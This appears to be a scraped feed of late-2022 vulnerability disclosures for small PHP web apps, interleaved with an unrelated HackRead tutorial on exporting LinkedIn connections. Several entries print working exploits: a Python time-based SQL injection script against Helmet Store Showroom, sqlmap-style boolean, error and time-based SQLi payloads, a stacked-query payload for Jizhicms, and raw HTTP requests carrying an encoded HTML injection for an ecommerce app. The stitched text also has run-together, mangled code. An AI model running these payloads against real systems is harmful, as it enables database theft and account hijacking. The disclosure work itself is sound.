Web Based Quiz System v1.0 transmits user passwords in plaintext during the authentication process, allowing attackers to obtain users' passwords via a bruteforce attack.

Software Link: https://www.sourcecodester.com/download-code?nid=14727&title=Web+Based+Quiz+System+in+PHP%2FMySQLi+with+Full+Source+Code

Version: v1.0

**

Steps to reproduce:

**

Try to login in the input box.

Capture the packet and find that the password is plaintext transmission, and try to conduct a violent attack.

Judge whether it is the correct password according to different return values.

**

Patch recommendation:

**

Add ratelimit protecion on POST login endpoints/parameters

CVE-2022-44411: Web Based Quiz System v1.0 is vulnerable to brute force attack

Helmet Store Showroom version 1.0 suffers from an authenticated remote SQL injection vulnerability.

    # Exploit Title: Helmet Store Showroom  1.0 - authenticated SQL Injection# Date: 25-11-2022# Exploit Author: syad# Vendor Homepage: https://www.sourcecodester.com# Software Link: https://www.sourcecodester.com/php/15851/helmet-store-showroom-site-php-and-mysql-free-source-code.html# Version: 1.0# Tested on: Windows 10 + XAMPP 3.2.4# CVE ID : N/A# Description# The id parameter does not perform input validation on the view_product.php file it allow authenticated Time Based SQL Injection.import requestsimport sysimport pyfigletsess = requests.Session()proxies = {"https": "https://127.0.0.1:8080", "http": "http://127.0.0.1:8080"}def login1(ip,username,password):    x  = "http://%s/hss/classes/Login.php?f=login" % ip    login = {'username':username, 'password':password}    r = sess.post(x, data=login, proxies=proxies)    #print(r.content)def login(ip):    x = ("http://%s/hss/admin") % ip    r = sess.get(x,proxies=proxies)    if "Welcome to Helmet Store Showroom - PHP" in r.text:        print("--------------------------------------------")        print("[+] Success Login")    def detect_sql(ip):    x = "http://%s/hss/admin/?page=products/view_product&id=2'" % ip    r = sess.get(x,proxies=proxies)    if "You have an error in your SQL syntax" in r.text:        print("[+] Found SQL Error")    def time_based_sqli(ip):    x = "http://%s/hss/admin/?page=products/view_product&id=2'+or+sleep(5)--+-" % ip    r = sess.get(x,proxies=proxies)    print("[+] Time Based SQL Found")    print("[*]!!! Time To Report !!!")    if __name__ == "__main__":    result = pyfiglet.figlet_format("PWN")    print(result)    try:        ip = sys.argv[1].strip()        username = sys.argv[2].strip()        password = sys.argv[3].strip()    except IndexError:        print("[-] Usage %s <ip> <username> <password>" % sys.argv[0])        print("[-] Example: %s 192.168.1.x"  % sys.argv[0])        sys.exit(-1)login1(ip,username,password)login(ip)detect_sql(ip)time_based_sqli(ip)

Helmet Store Showroom 1.0 SQL Injection

Sanitization Management System version 1.0 suffers from a remote SQL injection vulnerability.

    ## Title: SMS - PHP (by: oretnom23 ) v1.0 SQLi## Author: nu11secur1ty## Date: 11.25.2022## Vendor: https://github.com/oretnom23,https://www.sourcecodester.com/users/tips23## Software: https://www.sourcecodester.com/download-code?nid=15770&title=Sanitization+Management+System+Project+in+PHP+and+MySQL+Free+Source+Code## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/Sanitization-Management-System-1.0## Description:The `id` parameter appears to be vulnerable to SQL injection attacks.The attacker can get all information from this system by using thisvulnerability.## STATUS: HIGH Vulnerability - CRITICAL[+] Payload:```MySQLParameter: id (GET)    Type: boolean-based blind    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)    Payload: p=services/view_service&id=126664801' or '5968'='5975' ORNOT 5461=5461 AND 'gEud'='gEud    Type: error-based    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY orGROUP BY clause (FLOOR)    Payload: p=services/view_service&id=126664801' or '5968'='5975' OR(SELECT 5753 FROM(SELECT COUNT(*),CONCAT(0x7176707671,(SELECT(ELT(5753=5753,1))),0x71767a7071,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'DEYy'='DEYy    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: p=services/view_service&id=126664801' or '5968'='5975'AND (SELECT 6369 FROM (SELECT(SLEEP(5)))Rnfu) AND 'PUfi'='PUfi```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/Sanitization-Management-System-1.0)## Proof and Exploit:[href](https://streamable.com/rnfvjf)## Time spent`00:30:00`

Sanitization Management System 1.0 SQL Injection

By Owais Sultan
One of the best things about LinkedIn is that it allows you to download a CSV file with…
This is a post from HackRead.com Read the original post: How to use Linked Helper 2 as a LinkedIn Data Export Tool

One of the best things about LinkedIn is that it allows you to download a CSV file with your first-degree connections information. This file, however, lacks the email and phone numbers of the profile.

However, provided your first-degree connection has provided this information on your LinkedIn, it can easily be obtained by Linked Helper 2. It is important to note that getting the phone numbers and emails of your second and third degree is impossible because LinkedIn does not grant you access to such information.

You can use Linked Helper 2 to export your first-degree connections on LinkedIn to a downloadable CSV file. In addition, Linked Helper 2 also gives you a chance to create a targeted mailing list. In this article, we will guide you step by step on how you can use Linked Helper as a LinkedIn data export tool.

We are going to walk you through the following steps;

*   Creation of a new campaign
*   Profile collection
*   Adjusting action configurations
*   Starting the Campaign
*   Downloading the CSV file

Let us dive in!

**1 Generate a new campaign using a template with preset commands**

To create a new campaign, open the Campaign menu and click the Create new command. A pop window will appear, requiring you to name your Campaign. The next step is selecting the type of Campaign you want. At this stage, pick **people** as the campaign type. After that, select the needed template, i.e., **Visit and Extract profiles.** Wrap up by clicking the **Create** button.

Here, the Campaign generated only has a single action. However, if more steps are needed, you can configure the Workflow and add more actions.

**2 Profile collection into your created Campaign**

Near the Campaign queue, locate and click the **Collect** button. You will then be prompted to provide the source of your profiles. Since we want to collect first-degree connection profiles, we will use **the My network page** as the source.

After collecting the profiles, you can also review them to check for errors.

**3 Fine-tune action configurations**

You can adjust action settings under the General tab. Here you can configure the action’s name and suspend the start of the action. After a profile has been processed through an activity, Linked Helper 2 can automatically remove or assign tags associated with the profile.

On the **Tags tab** under the action, enter a tag name and confirm it by pressing enter on your personal computer. Now proceed to the Display settings Tab, select Bunch, and fine-tune its size and the time between bunches.

**4 Start the Campaign**

Start the Campaign can quickly be done by clicking the **Start campaign** button on the left menu. You can also launch the Campaign by clicking the **Start** button at the topmost section of your screen.

As soon as the campaign launches, the Campaign’s status will change, and Linked Helper will display when the subsequent step is carried out. Linked Helper uses a green frame to highlight the Campaign being performed.

**5 Download CSV profiles**

Visited profiles are stored under the **Successful** sub-list by Linked Helper. To access them click the **Successful** command or **Campaign**, then **Workflow.** 

To download these profiles, first, click **the Select all** button to select all the profiles. Finish up by clicking **Download.** Remember to choose your delimiter, preferably Google Sheets or MS Excel.

1.  How to Use Excel to Scrape a Website
2.  Penetration Testing Azure: The User-Friendly Guide
3.  How to configure cPanel and WHM Panel on your VPS
4.  6 Best Ways to Make a Collaborative PowerPoint Presentation
5.  MySQL Performance Tuning: Top 5 Tips for Blazing Fast Queries

Owais takes care of Hackread's social media from the very first day. At the same time He is pursuing for chartered accountancy and doing part time freelance writing.

How to use Linked Helper 2 as a LinkedIn Data Export Tool

Ecommerce version 1.0 suffers from cross site scripting and open redirection vulnerabilities.

    ## Title: Ecommerse-1.0 XSS-Reflected Hijack-credentials - JavaScript Injection## Author: nu11secur1ty## Date: 11.23.2022## Vendor: https://github.com/winston-dsouza## Software: https://github.com/winston-dsouza/ecommerce-website## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/winston-dsouza/ecommerce-website## Description:The value of the eMail request parameter is copied into the value ofan HTML tag attribute which is encapsulated in double quotation marks.The attacker can trick the users of this system, very easy to visit avery dangerous link from anywhere, and then the game will over forthese customers.Also, the attacker can create a network from botnet computers by usingthis vulnerability.## STATUS: HIGH Vulnerability[+] Exploit00:```POSTPOST /ecommerce/index.php?error=If%20you%20lose%20your%20credentials%20information,%20please%20use%20our%20recovery%20webpage%20to%20recover%20your%20account.%20https://pornhub.comHTTP/1.1Host: pwnedhost.comAccept-Encoding: gzip, deflateAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107Safari/537.36Connection: closeCache-Control: max-age=0Cookie: PHPSESSID=td6bitb72h0e1nuqa4ft9q8e2fOrigin: http://pwnedhost.comUpgrade-Insecure-Requests: 1Referer: http://pwnedhost.com/ecommerce/index.phpContent-Type: application/x-www-form-urlencodedSec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"Sec-CH-UA-Platform: WindowsSec-CH-UA-Mobile: ?0Content-Length: 0```## Description01:JavaScript can be injected into the application response (a vulnerableapp - signup_script.php, no sanitizing submit function).The attacker can crash the MySQL server by sending large bites of POSTrequests to the MySQL server of this system.## STATUS: HIGH Vulnerability - CRITICAL## Real attack:[+] Exploit01:```POSTPOST /ecommerce/signup_script.php HTTP/1.1Host: pwnedhost.comAccept-Encoding: gzip, deflateAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107Safari/537.36Connection: closeCache-Control: max-age=0Cookie: PHPSESSID=td6bitb72h0e1nuqa4ft9q8e2fOrigin: http://pwnedhost.comUpgrade-Insecure-Requests: 1Referer: http://pwnedhost.com/ecommerce/index.phpContent-Type: application/x-www-form-urlencodedSec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"Sec-CH-UA-Platform: WindowsSec-CH-UA-Mobile: ?0Content-Length: 1070eMail=%3c%61%20%68%72%65%66%3d%22%68%74%74%70%73%3a%2f%2f%70%6f%72%6e%68%75%62%2e%63%6f%6d%2f%22%20%74%61%72%67%65%74%3d%22%5f%62%6c%61%6e%6b%22%20%72%65%6c%3d%22%6e%6f%6f%70%65%6e%65%72%20%6e%6f%66%6f%6c%6c%6f%77%20%75%67%63%22%3e%0a%3c%69%6d%67%20%73%72%63%3d%22%68%74%74%70%73%3a%2f%2f%63%64%6e%35%2d%63%61%70%72%69%6f%66%69%6c%65%73%2e%6e%65%74%64%6e%61%2d%73%73%6c%2e%63%6f%6d%2f%77%70%2d%63%6f%6e%74%65%6e%74%2f%75%70%6c%6f%61%64%73%2f%32%30%31%37%2f%30%37%2f%49%4d%47%5f%30%30%36%38%2e%67%69%66%3f%3f%74%6f%6b%65%6e%3d%47%48%53%41%54%30%41%41%41%41%41%41%42%58%57%47%53%4b%4f%48%37%4d%42%46%4c%45%4b%46%34%4d%36%59%33%59%43%59%59%4b%41%44%54%51%26%72%73%3d%31%22%20%73%74%79%6c%65%3d%22%62%6f%72%64%65%72%3a%31%70%78%20%73%6f%6c%69%64%20%62%6c%61%63%6b%3b%6d%61%78%2d%77%69%64%74%68%3a%31%30%30%25%3b%22%20%61%6c%74%3d%22%50%68%6f%74%6f%20%6f%66%20%42%79%72%6f%6e%20%42%61%79%2c%20%6f%6e%65%20%6f%66%20%41%75%73%74%72%61%6c%69%61%27%73%20%62%65%73%74%20%62%65%61%63%68%65%73%21%22%3e%0a%3c%2f%61%3e&password=s9L%21c7x%21E2&firstName=WoZykRqh&lastName=cqeMPJcJ```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/winston-dsouza/ecommerce-website)## Proof and Exploit:[href](https://streamable.com/3r4t36)## Real Exploit:[href](https://streamable.com/n3b5ev)## Real Exploit - code insert:[href](https://streamable.com/64dmo2)## Time spent`1:45`

Ecommerce 1.0 Cross Site Scripting / Open Redirect

A vulnerability was found in rickxy Stock Management System and classified as critical. Affected by this issue is some unknown functionality of the file /pages/processlogin.php. The manipulation of the argument user/password leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-214322 is the identifier assigned to this vulnerability.

CVE-2022-4088

The web-based admin console in H2 Database Engine through 2.1.214 can be started via the CLI with the argument -webAdminPassword, which allows the user to specify the password in cleartext for the web admin console. Consequently, a local user (or an attacker that has obtained local access through some means) would be able to discover the password by listing processes and their arguments. NOTE: the vendor states "This is not a vulnerability of H2 Console ... Passwords should never be passed on the command line and every qualified DBA or system administrator is expected to know that."

CVE-2022-45868: h2database/WebServer.java at 96832bf5a97cdc0adc1f2066ed61c54990d66ab5 · h2database/h2database

Jizhicms v2.3.3 was discovered to contain a SQL injection vulnerability via the /index.php/admins/Fields/get_fields.html component.

This is one of my favorite CMS, but I found a system vulnerability.  
name：jizhicms  
version: v2.3.3  
Installation package download：  
  
Problematic packets:

> POST /index.php/admins/Fields/get\_fields.html HTTP/1.1  
> Host: 192.168.23.130:49158  
> User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0  
> Accept: _/_  
> Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2  
> Accept-Encoding: gzip, deflate  
> Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
> X-Requested-With: XMLHttpRequest  
> Content-Length: 21  
> Origin: http://192.168.23.130:49158  
> Connection: close  
> Referer: http://192.168.23.130:49158/index.php/admins/Extmolds/editmolds/id/1/molds/tags.html  
> Cookie: PHPSESSID=07lpb0tri05c4fqvd85em8u6rs
> 
> molds=tags&tid=0&id=1

Background ->SEO settings ->TGA list ->edit, and then capture packages  
  

  
Vulnerability verification exists

payload

    Parameter: molds (POST)
    Type: stacked queries
    Title: MySQL >= 5.0.12 stacked queries (comment)
    Payload: molds=tags;SELECT SLEEP(5)#&tid=0&id=3

CVE-2022-45278: jizhicms v2.3.3 has a vulnerability, SQL injection · Issue #83 · Cherry-toto/jizhicms

dedecmdv6 6.1.9 is vulnerable to SQL Injection. via sys_sql_query.php.

\[CVE ID\]

CVE-2022-44120

\[PRODUCT\]

DedeCMSV6

\[VERSION\]

V6.1.9

\[PROBLEM TYPE\]

SQL Injection

\[DESCRIPTION\]

DedeCMS v6.1.9 has a sql injection vulnerability

CVE-2022-44120: CVE-2022-44120

Boa 0.94.14rc21 is vulnerable to SQL Injection via username.

\[CVE ID\]

CVE-2022-44117

\[PRODUCT\]

Boa 0.94.14rc21

\[VERSION\]

Boa 0.94.14rc21

\[PROBLEM TYPE\]

SQL Injection

\[DESCRIPTION\]

Boa 0.94.14rc21 is vulnerable to SQL Injection via username.

Tag

#sql